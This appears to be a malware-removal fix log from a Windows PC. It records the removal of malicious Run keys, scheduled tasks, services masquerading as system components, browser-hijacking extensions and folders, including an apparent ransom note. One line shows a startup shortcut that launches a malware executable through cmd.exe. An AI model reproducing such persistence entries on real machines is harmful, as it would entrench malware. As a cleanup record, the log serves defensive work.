    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\8384140" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => removed successfully
    C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cuebedbh.lnk => moved successfully
    ShortcutAndArgument: cuebedbh.lnk -> C:\Windows\System32\cmd.exe => /c start "" "C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh\atsfwaeb.exe" => Error: No automatic fix found for this entry.
    C:\Windows\system32\GroupPolicy\Machine => moved successfully
    C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
    C:\Windows\system32\GroupPolicy\User => moved successfully
    C:\Windows\system32\GroupPolicyUsers\S-1-5-21-3161437104-263828448-1275724104-1003\User => moved successfully
    HKLM\SOFTWARE\Policies\Google => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{001B6186-B9F4-4CCC-8B0C-5A0B2C8BE885}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{001B6186-B9F4-4CCC-8B0C-5A0B2C8BE885}" => removed successfully
    C:\Windows\System32\Tasks\mrAArNosEtAJT2 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\mrAArNosEtAJT2" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0E237A46-D40A-4229-92DB-821169F5C7D9}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E237A46-D40A-4229-92DB-821169F5C7D9}" => removed successfully
    C:\Windows\System32\Tasks\Online Application V2G3 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G3" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11EE3D86-DD42-4287-AB72-91B6550F8885}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11EE3D86-DD42-4287-AB72-91B6550F8885}" => removed successfully
    C:\Windows\System32\Tasks\Online Application V2G1 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G1" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{13758B1C-CCCE-40FB-90DC-73EA63748EA5}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13758B1C-CCCE-40FB-90DC-73EA63748EA5}" => removed successfully
    C:\Windows\System32\Tasks\{C287A332-65DB-4AC3-A344-FE668FB44526} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C287A332-65DB-4AC3-A344-FE668FB44526}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{35285663-7DD7-4E11-B167-1D353FF1E149}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{35285663-7DD7-4E11-B167-1D353FF1E149}" => removed successfully
    C:\Windows\System32\Tasks\Online Application V2G6 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G6" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3A251981-B8E1-4DA9-AA55-A0B4BADA6873}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3A251981-B8E1-4DA9-AA55-A0B4BADA6873}" => removed successfully
    C:\Windows\System32\Tasks\{B7E4FFCD-3871-411A-A449-6E0BC062B522} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B7E4FFCD-3871-411A-A449-6E0BC062B522}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{50A23EB5-B5AB-415B-91F9-EB82F18D26F2}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{50A23EB5-B5AB-415B-91F9-EB82F18D26F2}" => removed successfully
    C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JSpPUlYEOjGQEpF2" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5554764B-4F14-40B3-988C-E8F6186CF607}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5554764B-4F14-40B3-988C-E8F6186CF607}" => removed successfully
    C:\Windows\System32\Tasks\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5C42DC6E-5254-4CFD-B2E7-FF9B7131A1FE}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5C42DC6E-5254-4CFD-B2E7-FF9B7131A1FE}" => removed successfully
    C:\Windows\System32\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5E7F7887-993A-417B-92FC-82E97B925178}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E7F7887-993A-417B-92FC-82E97B925178}" => removed successfully
    C:\Windows\System32\Tasks\{CE00E3F7-606E-4CC5-98BE-BCBCB27B9EDC} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CE00E3F7-606E-4CC5-98BE-BCBCB27B9EDC}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{60BB3925-74CF-4F9F-A3D7-3290133AFE4E}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{60BB3925-74CF-4F9F-A3D7-3290133AFE4E}" => removed successfully
    C:\Windows\System32\Tasks\Updater_Online_Application => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater_Online_Application" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{68AB5BC1-8480-41B1-A5D7-4D30C4B47665}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68AB5BC1-8480-41B1-A5D7-4D30C4B47665}" => removed successfully
    C:\Windows\System32\Tasks\Opera scheduled Autoupdate 711520318 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 711520318" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{87335B70-CF14-4C5E-864F-21555C94C5FE}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87335B70-CF14-4C5E-864F-21555C94C5FE}" => removed successfully
    C:\Windows\System32\Tasks\lsa64 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\lsa64" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8C64D776-FF35-4E90-97BA-6D5B1553A472}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C64D776-FF35-4E90-97BA-6D5B1553A472}" => removed successfully
    C:\Windows\System32\Tasks\AWWcazHJnUfLPA => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AWWcazHJnUfLPA" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A6E3971E-20D5-4BF5-A39D-17F461A85671}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6E3971E-20D5-4BF5-A39D-17F461A85671}" => removed successfully
    C:\Windows\System32\Tasks\{E41E9167-5C86-4994-8330-CCBE7DF1D074} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E41E9167-5C86-4994-8330-CCBE7DF1D074}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B11C4F0E-95C9-47A6-ACC8-60C53F6720C3}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B11C4F0E-95C9-47A6-ACC8-60C53F6720C3}" => removed successfully
    C:\Windows\System32\Tasks\Online Application V2G2 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G2" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B377FEF3-420E-4825-A91F-00E92909C6EF}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B377FEF3-420E-4825-A91F-00E92909C6EF}" => removed successfully
    C:\Windows\System32\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072} => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B5DB98CD-7C51-4E3E-BB89-905B08A039F2}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B5DB98CD-7C51-4E3E-BB89-905B08A039F2}" => removed successfully
    C:\Windows\System32\Tasks\Online Application V2G4 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G4" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7648C78-359C-47AD-B703-FE0ABDEB20D8}" => not found
    "C:\Windows\System32\Tasks\Yahoo! Powered rasin" => not found
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yahoo! Powered rasin" => not found
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C63C6C6E-54CE-4FFA-8039-DD354299B883}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C63C6C6E-54CE-4FFA-8039-DD354299B883}" => removed successfully
    C:\Windows\System32\Tasks\Time Trigger Task => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Time Trigger Task" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C64B27F0-57F2-4DCB-9AB5-045382600C92}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C64B27F0-57F2-4DCB-9AB5-045382600C92}" => removed successfully
    C:\Windows\System32\Tasks\Online Application V2G5 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G5" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D99E7C60-2B55-4378-BD20-80EF4946069F}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D99E7C60-2B55-4378-BD20-80EF4946069F}" => removed successfully
    C:\Windows\System32\Tasks\csrss => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E3BCCF2F-7E87-41AB-91CB-DE1669B8CA94}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E3BCCF2F-7E87-41AB-91CB-DE1669B8CA94}" => removed successfully
    C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\txgYfgWClJeJBSoaCDR2" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EEC1D397-3475-4488-8723-AAC01A6F4884}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEC1D397-3475-4488-8723-AAC01A6F4884}" => removed successfully
    C:\Windows\System32\Tasks\ScheduledUpdate => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F9AEF3CB-5875-43BC-AB23-BE5DD06B7D6B}" => removed successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9AEF3CB-5875-43BC-AB23-BE5DD06B7D6B}" => removed successfully
    C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2 => moved successfully
    "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\raSRPAMuIMRBbwMvC2" => removed successfully
    C:\Windows\Tasks\Online Application V2G1.job => moved successfully
    C:\Windows\Tasks\Online Application V2G2.job => moved successfully
    C:\Windows\Tasks\Online Application V2G3.job => moved successfully
    C:\Windows\Tasks\Online Application V2G4.job => moved successfully
    C:\Windows\Tasks\Online Application V2G5.job => moved successfully
    C:\Windows\Tasks\Online Application V2G6.job => moved successfully
    C:\Windows\Tasks\Updater_Online_Application.job => moved successfully
    "C:\Windows\Tasks\Yahoo! Powered rasin.job" => not found
    C:\Windows\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}.job => moved successfully
    C:\Windows\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}.job => moved successfully
    "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{644D5D4C-C575-4567-B554-70E1BFCA99F2}\\NameServer" => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main\\Secondary Start Pages" => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
    HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} => removed successfully
    HKLM\Software\Classes\CLSID\{26080cad-4adc-49ac-8c63-eda16e595cbd} => not found
    HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146} => removed successfully
    HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => not found
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => not found
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{26080cad-4adc-49ac-8c63-eda16e595cbd} => not found
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} => removed successfully
    HKLM\Software\Classes\CLSID\{26080cad-4adc-49ac-8c63-eda16e595cbd} => not found
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} => removed successfully
    HKLM\Software\Classes\CLSID\{ielnksrch} => not found
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} => removed successfully
    HKLM\Software\Classes\CLSID\{7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} => removed successfully
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06} => removed successfully
    HKLM\Software\Classes\CLSID\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06} => removed successfully
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ccb24e92-62c4-4c53-95d2-65f9eed476bc} => removed successfully
    HKLM\Software\Classes\CLSID\{ccb24e92-62c4-4c53-95d2-65f9eed476bc} => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{aeef4389-6327-45e5-9552-021c0f5aef2d} => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{aeef4389-6327-45e5-9552-021c0f5aef2d} => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ccb24e92-62c4-4c53-95d2-65f9eed476bc} => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{ccb24e92-62c4-4c53-95d2-65f9eed476bc} => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} => removed successfully
    "HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{ccb24e92-62c4-4c53-95d2-65f9eed476bc}" => removed successfully
    HKLM\Software\Classes\CLSID\{ccb24e92-62c4-4c53-95d2-65f9eed476bc} => not found
    "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{ccb24e92-62c4-4c53-95d2-65f9eed476bc}" => removed successfully
    HKLM\Software\Wow6432Node\Classes\CLSID\{ccb24e92-62c4-4c53-95d2-65f9eed476bc} => not found
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\user.js => moved successfully
    FF user.js: detected! => C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\user.js [2015-12-10]FF Homepage: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.HPFF NewTab: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.NT => "C:\Users\ADMIN\AppData\Roaming\detected! => C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\user.js [2015-12-10]FF Homepage: Mozilla\Firefox\Profiles\5xrpb4mz.default\prefs.js" not found
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{607b689f-7600-45e4-b8e5-887f72dab15c} => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{607b689f-7600-45e4-b8e5-887f72dab15c} => path removed successfully
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\Extensions\{f2e0e2a9-4e09-4b8a-aadb-fa21ba86ba05}.xpi => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\default.xml => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\findit.xml => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default\searchplugins\yahoo_ff.xml => moved successfully
    HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/Lync,version=15.0 => removed successfully
    HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0 => removed successfully
    "Chrome HomePage" => removed successfully
    "Chrome StartupUrls" => removed successfully
    "Chrome DefaultSearchURL" => removed successfully
    "Chrome DefaultSearchKeyword" => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\afgeoapebnkefelmpoepnmjiflidjjce => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\egenicdiafgbhogabodhpfcbcgnpocip => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\hppemobdikemkbmccnjbilolonmpaljl => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\olojcnagmcbplpdddabmpfehhlleobpb => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\pdpcpceofkopegffcdnffeenbfdldock => removed successfully
    HKLM\SOFTWARE\Google\Chrome\Extensions\pilplloabdedfmialnfchjomjmpjcoej => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\afgeoapebnkefelmpoepnmjiflidjjce => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\egenicdiafgbhogabodhpfcbcgnpocip => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\hppemobdikemkbmccnjbilolonmpaljl => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\olojcnagmcbplpdddabmpfehhlleobpb => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\pdpcpceofkopegffcdnffeenbfdldock => removed successfully
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Google\Chrome\Extensions\pilplloabdedfmialnfchjomjmpjcoej => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\afgeoapebnkefelmpoepnmjiflidjjce => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\egenicdiafgbhogabodhpfcbcgnpocip => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hppemobdikemkbmccnjbilolonmpaljl => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iphahelpmejkbidhiecfeicblienleon => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\npdicihegicnhaangkdmcgbjceoemeoo => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\olojcnagmcbplpdddabmpfehhlleobpb => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pdpcpceofkopegffcdnffeenbfdldock => removed successfully
    HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pilplloabdedfmialnfchjomjmpjcoej => removed successfully
    C:\Users\ADMIN\AppData\Roaming\Opera Software\Opera Stable\Extensions\nknpohplagminmhchlbhigcgcdfigion => moved successfully
    HKLM\System\CurrentControlSet\Services\backlh => removed successfully
    backlh => service removed successfully
    HKLM\System\CurrentControlSet\Services\CloudPrinter => removed successfully
    CloudPrinter => service removed successfully
    HKLM\System\CurrentControlSet\Services\WinDefender => removed successfully
    WinDefender => service removed successfully
    HKLM\System\CurrentControlSet\Services\WsDrvInst => removed successfully
    WsDrvInst => service removed successfully
    C:\Program Files (x86)\BbdjrrKUeUXuC => moved successfully
    C:\Program Files (x86)\WOFbcaOaHmAU2 => moved successfully
    C:\Program Files (x86)\vONNFjhTKIE => moved successfully
    C:\Program Files (x86)\uvtpOaoQoRUn => moved successfully
    "C:\Windows\System32\Tasks\AWWcazHJnUfLPA" => not found
    "C:\Windows\System32\Tasks\mrAArNosEtAJT2" => not found
    "C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2" => not found
    "C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2" => not found
    "C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2" => not found
    C:\ProgramData\JrsbweBqGiQFiyVB => moved successfully
    C:\Program Files (x86)\woOqILJDRwqbnTOZbgR => moved successfully
    C:\Program Files (x86)\rZdaClXBU => moved successfully
    C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo => moved successfully
    C:\Program Files\A5H2CDJ5DL => moved successfully
    C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4 => moved successfully
    C:\Program Files\1B0ZGH03DT => moved successfully
    C:\Users\ADMIN\Downloads\policies.json.cezor => moved successfully
    C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol => moved successfully
    C:\Program Files\9RIR0W407U => moved successfully
    "C:\Windows\System32\Tasks\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0}" => not found
    "C:\Windows\System32\Tasks\{B7E4FFCD-3871-411A-A449-6E0BC062B522}" => not found
    C:\Users\ADMIN\AppData\Roaming\appdata.dat => moved successfully
    "C:\Windows\System32\Tasks\lsa64" => not found
    C:\Users\ADMIN\_readme.txt => moved successfully
    C:\Users\ADMIN\AppData\Local\41915b66-3c0e-4c75-b4d9-0c7c8eb59d6c => moved successfully
    C:\SystemID => moved successfully
    C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f => moved successfully
    "C:\Windows\System32\Tasks\Opera scheduled Autoupdate 711520318" => not found
    "C:\Windows\System32\Tasks\Time Trigger Task" => not found
    "C:\Windows\Tasks\Online Application V2G6.job" => not found
    "C:\Windows\Tasks\Online Application V2G5.job" => not found
    "C:\Windows\Tasks\Online Application V2G4.job" => not found
    "C:\Windows\Tasks\Online Application V2G3.job" => not found
    "C:\Windows\Tasks\Online Application V2G2.job" => not found
    "C:\Windows\Tasks\Online Application V2G1.job" => not found
    "C:\Windows\Tasks\Updater_Online_Application.job" => not found
    C:\Users\ADMIN\AppData\Roaming\eppsrq3otww => moved successfully
    C:\Program Files\S2SM7ZWF99 => moved successfully
    C:\Program Files (x86)\Reciper => moved successfully
    C:\ProgramData\ntuser.pol => moved successfully
    C:\Default.xml => moved successfully
    "C:\Windows\System32\Tasks\Updater_Online_Application" => not found
    "C:\Windows\System32\Tasks\Online Application V2G6" => not found
    "C:\Windows\System32\Tasks\Online Application V2G5" => not found
    "C:\Windows\System32\Tasks\Online Application V2G4" => not found
    "C:\Windows\System32\Tasks\Online Application V2G3" => not found
    "C:\Windows\System32\Tasks\Online Application V2G2" => not found
    "C:\Windows\System32\Tasks\Online Application V2G1" => not found
    C:\Users\ADMIN\AppData\Roaming\Microleaves => moved successfully
    C:\Users\ADMIN\AppData\Roaming\EpicNet Inc => moved successfully
    C:\Users\ADMIN\AppData\Local\AdvinstAnalytics => moved successfully
    C:\Program Files (x86)\Seed Trade => moved successfully
    C:\Program Files (x86)\Microleaves => moved successfully
    C:\ProgramData\Logic Cramble => moved successfully
    "C:\Windows\System32\Tasks\ScheduledUpdate" => not found
    "C:\Windows\System32\Tasks\csrss" => not found
    C:\Users\ADMIN\AppData\Local\Villalux.bin => moved successfully
    C:\Windows\windefender.exe => moved successfully
    C:\Windows\SysWOW64\findit.xml => moved successfully
    C:\ProgramData\Quoteexs => moved successfully
    C:\Program Files (x86)\foldershare => moved successfully
    C:\Windows\rss => moved successfully
    C:\Users\ADMIN\AppData\Local\sha.db => moved successfully
    C:\Users\ADMIN\AppData\Local\agent.dat => moved successfully
